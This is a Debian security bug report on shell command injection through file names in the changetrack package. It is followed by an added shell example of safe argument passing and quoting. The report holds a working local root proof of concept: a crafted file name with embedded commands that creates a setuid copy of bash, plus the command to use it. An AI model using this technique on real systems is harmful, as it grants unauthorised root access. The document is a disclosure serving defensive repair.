Marek Grzybowski
2009-Sep-15 19:23 UTC
[Secure-testing-team] Bug#546791: changetrack: shell command injection via filename
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole

-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages changetrack depends on:
ii libfile-ncopy-perl 0.34-1 file copying like cp for perl
ii perl 5.10.0-19 Larry Wall's Practical Extraction

Versions of packages changetrack recommends:
ii cron 3.0pl1-105 management of regular background p
ii ed 0.7-3 The classic unix line editor

changetrack suggests no packages.

-- no debconf information

It is possible to run commands as root if you have permission to create files in a directory checked via changetrack, example:

mkdir /etc/test
touch "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash bash.ultimate
chmod ug+s bash.ultimate
"
echo "/etc/test/*" >> /etc/changetrack.conf

wait for /etc/cron.hourly/changetrack

# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate

bash.ultimate -p
;)

Probably changetrack should not use shell commands, or escape sh special characters like spaces, enters, ; etc...

--
Regards
Marek Grzybowski
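The two remedies named at the end of the report (do not let a shell parse the file name, or escape shell-special characters), shown as an added example that is not part of the original message and is not changetrack's code. It assumes `cat` as a stand-in for the command run on each tracked file; `sh_quote`, the `read_*` functions and the sample file name are hypothetical and constructed, and the embedded line only prints a marker.

```shell
#!/bin/sh
# Added example, not changetrack's code. `cat` stands in for the command a
# tool runs on each tracked file (assumption).

# Hypothetical helper: quote a string for /bin/sh by wrapping it in single
# quotes and rewriting each embedded ' as '\''. The trailing "x" sentinel
# keeps $(...) from dropping newlines at the end of the name.
sh_quote() {
    q=$(printf '%sx' "$1" | sed "s/'/'\\\\''/g")
    printf "'%s'" "${q%x}"
}

# Unsafe: the name is pasted into a command string that a shell parses,
# so a newline inside the name starts a new command.
read_unsafe() { sh -c "cat $1" 2>/dev/null; }

# Safe: the name is passed as an argument ("$1" of the inner shell) and is
# never parsed as shell syntax; "--" stops a leading "-" acting as an option.
read_as_argument() { sh -c 'cat -- "$1"' sh "$1"; }

# Safe when a command string cannot be avoided: quote the name first.
read_quoted() { sh -c "cat -- $(sh_quote "$1")"; }

# Constructed sample: a file whose name contains a newline followed by a
# line that only prints a marker. Sets $dir and $name.
make_sample() {
    dir=$(mktemp -d) || return 1
    name="$dir/sth
echo INJECTED"
    printf 'data\n' > "$name"
}

make_sample || exit 1
printf 'unsafe:      %s\n' "$(read_unsafe "$name")"       # marker line ran
printf 'as argument: %s\n' "$(read_as_argument "$name")"  # file content
printf 'quoted:      %s\n' "$(read_quoted "$name")"       # file content
rm -rf "$dir"
```

In a Perl program the counterpart of `read_as_argument` is the list form of `system`/`exec`, which runs the command without going through `/bin/sh`.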